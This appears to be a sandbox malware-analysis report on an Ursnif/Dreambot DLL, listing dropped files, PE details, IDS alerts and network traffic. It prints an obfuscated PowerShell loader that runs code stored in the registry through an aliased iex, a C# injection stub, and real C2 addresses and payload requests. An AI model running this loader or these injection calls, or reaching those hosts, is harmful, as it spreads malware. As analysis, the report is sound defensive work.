                                                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.273397991548263
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbUVRiGzxs7+AEszIwkn23fbUVRib:p37Lvkmb6KRfaWZEif/
                                                        MD5:F97CB66DD8C253FC88F2A1ABDE39CAD4
                                                        SHA1:CAEB7B18048FAE724BAAFC52913BA622C6C35C21
                                                        SHA-256:12B39EEDA56822A7466297663B19E8004B4FFB97B3C790CD4BC9AB0130080271
                                                        SHA-512:4660DC64117C00716A63E2610CC4FD4BF625403A6C4B374B172014D6EEC2F418C44A281A29C1417D76DD8718F924CBDFF9EB02D2B62E48EC3433B77472D329AF
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.620170537753038
                                                        Encrypted:false
                                                        SSDEEP:24:etGSh8OmU0t3lm85xWAseO4zeQ64pfUPtkZfTmmVUWI+ycuZhNH3akSUgPNnq:63XQ3r5xNO1QfUuJTm231ulH3a3U4q
                                                        MD5:1AB06121FBA88EB939FBAEC284269D15
                                                        SHA1:ACECFD28F057FAD1625960F4AF3BDE028FDB56BA
                                                        SHA-256:AE88F1CC1909479D2283B685B88636F95894E4F4531C396F2257EC68B97678EA
                                                        SHA-512:84F2C00719730FC7DD4A187E6D7A5E75D7E56C104FDC4410BBD5F0076FD2D709B1930E4F7C11B9B34C5F81A5768C9D3A674850C10946E0D327ACC1AB928CFFC4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.345180643576188
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRf7EifmKaM5DqBVKVrdFAMBJTH:Akka6C7EumKxDcVKdBJj
                                                        MD5:B7A36CE98A0D245C6F1459976042CA57
                                                        SHA1:AF44D061EF7D477B87C69D38C8A1B82C3A3DC720
                                                        SHA-256:1DF9E43B160A4D953957F36047F09DCD9E147009BCD6EB844965627C6F2F567E
                                                        SHA-512:665CD4C5389E36539F045D8FFCF944F55B137E54DF90623E1DF12A70633B62E729321DA830AA8FA2F3258C422A5AA0C2B11D0A0935DDC37DF8E0C4A2E66E00E6
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1359
                                                        Entropy (8bit):5.382277499613012
                                                        Encrypted:false
                                                        SSDEEP:24:BxSAP7vBZ8x2DOXUWNlLCHMz4qWwHjeTKKjX4CIym1ZJX9VlLCHMz4GnxSAZa:BZDvj8oOtGA4twqDYB1ZHVGA4IZZa
                                                        MD5:D2E7CC2690DF87FB573063E288F90FF2
                                                        SHA1:49378232BF854F6E50F35B02DCA668FBAC9748ED
                                                        SHA-256:03EA7B710A6223D293E530520504E4153472C0FBDDD91F7626001D6D64676FE3
                                                        SHA-512:AD38C82F2AE62AA559ED48561BF3D119F268B2A80B9C042BC9ABAA60AABD070488C8A87DDC5B7A5E57E8CA99819900E6CA5E60F8378DEEE5D4474EC18A430F27
                                                        Malicious:false
                                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504161929..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504161929..**********************..PS>new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([S
                                                        Process:C:\Windows\System32\nslookup.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.039148671903071
                                                        Encrypted:false
                                                        SSDEEP:3:U+6QlBxAN:U+7BW
                                                        MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                        SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                        SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                        SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                        Malicious:false
                                                        Preview:Non-authoritative answer:...
                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.238635401847583
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:2oCOO5LbPu.dll
                                                        File size:442368
                                                        MD5:1217ff59e80cdae525287f2c6e9a43c6
                                                        SHA1:71760323e2c6528c2d346d85c9a138edcea984aa
                                                        SHA256:315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
                                                        SHA512:7452c0abb46996b098db3caa7c40856eff3407e8f578e85f412af990b8f26a46e59df08a6066069015e2a82b58773c731db33ce3913ca499cff1a420e62ec899
                                                        SSDEEP:6144:rSpWDtyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rSpuFlJqYhiVDwGU8OqaX1WW3zNg7
                                                        TLSH:0594F14977A12DBBEC0807761CF8C51B9B66BE2CA23A31DEA6683CFF7E175511048706
                                                        File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                                                        Icon Hash:9068eccc64f6e2ad
                                                        Entrypoint:0x401430
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add ecx, FFFFFFFFh
                                                        call 00007FC8ACE5154Ch
                                                        pop eax
                                                        pop eax
                                                        mov dword ptr [00414544h], eax
                                                        mov edx, dword ptr [00414660h]
                                                        sub edx, 00005289h
                                                        call edx
                                                        ret
                                                        int3
                                                        push esi
                                                        mov eax, ebx
                                                        mov dword ptr [00414540h], eax
                                                        pop dword ptr [00414538h]
                                                        mov dword ptr [00414548h], ebp
                                                        mov dword ptr [0041453Ch], edi
                                                        sub dword ptr [00414548h], FFFFFFFCh
                                                        loop 00007FC8ACE514F5h
                                                        mov dword ptr [ebp+00h], eax
                                                        nop
                                                        pop ds
                                                        push es
                                                        or al, C2h
                                                        mov byte ptr [7F7A077Eh], al
                                                        retf F3BAh
                                                        pop esp
                                                        cld
                                                        mov byte ptr [764053C9h], al
                                                        inc edi
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0xb710 | 0xc000 | False | 0.0737915039062 | data | 1.0233419997 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180297851562 | data | 3.71583062905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373738606771 | data | 6.02811283413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_BITMAP | 0x62360 | 0x666 | data | English | United States
                                                        RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                                        RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                                                        RT_ICON | 0x697d0 | 0xea8 | data | English | United States
                                                        RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                                        RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
                                                        RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
                                                        RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
                                                        RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
                                                        RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
                                                        RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
                                                        RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
                                                        RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
                                                        RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                                                        DLL | Import
                                                        KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                                                        OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx
                                                        USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                                                        GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                                                        ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                                                        msvcrt.dll | strcoll, fgetwc, srand
Description | Data
LegalCopyright | A Company. All rights reserved.
InternalName | (empty)
FileVersion | 1.0.0.0
CompanyName | A Company
ProductName | (empty)
ProductVersion | 1.0.0.0
FileDescription | (empty)
OriginalFilename | myfile.exe
Translation | 0x0409 0x04b0
(The version block is placeholder text: CompanyName "A Company", empty product fields, and an OriginalFilename of myfile.exe although the sample is a DLL.)
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/22-16:19:17.575336 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:21:22.118696 | TCP | 2823044 | ETPRO TROJAN W32.Dreambot Checkin | 49824 | 80 | 192.168.2.4 | 13.107.43.16
05/04/22-16:19:19.326271 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:18:57.385228 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.4 | 13.107.42.16
05/04/22-16:21:20.986284 | TCP | 2031743 | ET TROJAN Ursnif Payload Request (cook32.rar) | 49823 | 80 | 192.168.2.4 | 193.56.146.127
05/04/22-16:21:21.354584 | TCP | 2031744 | ET TROJAN Ursnif Payload Request (cook64.rar) | 49823 | 80 | 192.168.2.4 | 193.56.146.127
05/04/22-16:21:23.154439 | TCP | 2823044 | ETPRO TROJAN W32.Dreambot Checkin | 49825 | 80 | 192.168.2.4 | 116.121.62.237
05/04/22-16:19:18.765869 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49761 | 80 | 192.168.2.4 | 185.189.151.28
05/04/22-16:21:35.078524 | TCP | 2831962 | ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 | 49836 | 80 | 192.168.2.4 | 116.121.62.237
05/04/22-16:21:37.325898 | TCP | 2831962 | ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 | 49845 | 80 | 192.168.2.4 | 116.121.62.237
Note: 13.107.43.16 is the address returned for l-0007.l-dc-msedge.net (Microsoft) in the DNS answers below, and neither 13.107.42.16 nor 13.107.43.16 appears in the report's list of contacted malicious hosts; verify the three alerts toward those two addresses (16:18:57 and 16:21:22) against that endpoint before counting them as C2 contacts. The rule name "URI Struct M1 (_2B)" refers to the _2B-escaped base64 URI shape visible in the HTTP session below.
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 16:19:17.505877018 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.523657084 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.523854017 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.575335979 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.592833042 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863269091 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863297939 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863313913 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863331079 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863353014 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863365889 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863445997 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.863502026 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.863687038 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863704920 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863718033 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.863744020 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.863791943 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.864097118 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.864162922 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.864460945 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.864502907 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.864517927 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.864530087 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.864547968 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.864698887 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.864758015 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.880639076 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880717993 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880748987 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880790949 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880830050 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.880834103 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880861998 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880893946 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.880903006 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880928040 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.880942106 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880959034 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.880970001 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.880997896 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881022930 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881076097 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881222963 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881249905 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881289959 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881290913 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881331921 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881340981 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881359100 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881400108 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881412983 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881441116 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881459951 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881469011 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881531000 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881548882 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881589890 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881609917 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881639957 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881680012 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881690979 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881709099 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881742954 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881747961 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881787062 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881808043 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881818056 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881844044 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881858110 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881900072 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881922007 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.881927967 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.881958961 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898247957 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898296118 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898322105 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898355961 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898389101 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898412943 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898459911 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898541927 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898549080 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898578882 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898673058 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898674965 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898701906 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898772001 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.898889065 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898930073 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898955107 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.898988008 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.899008036 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.899019003 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.899024010 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.899049997 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.899082899 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.899107933 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
May 4, 2022 16:19:17.899120092 CEST | 49761 | 80 | 192.168.2.4 | 185.189.151.28
May 4, 2022 16:19:17.899142027 CEST | 80 | 49761 | 185.189.151.28 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 16:20:28.160969973 CEST | 64909 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2022 16:20:28.177081108 CEST | 53 | 64909 | 8.8.8.8 | 192.168.2.4
May 4, 2022 16:20:28.271305084 CEST | 64910 | 53 | 192.168.2.4 | 208.67.222.222
May 4, 2022 16:20:28.287652969 CEST | 53 | 64910 | 208.67.222.222 | 192.168.2.4
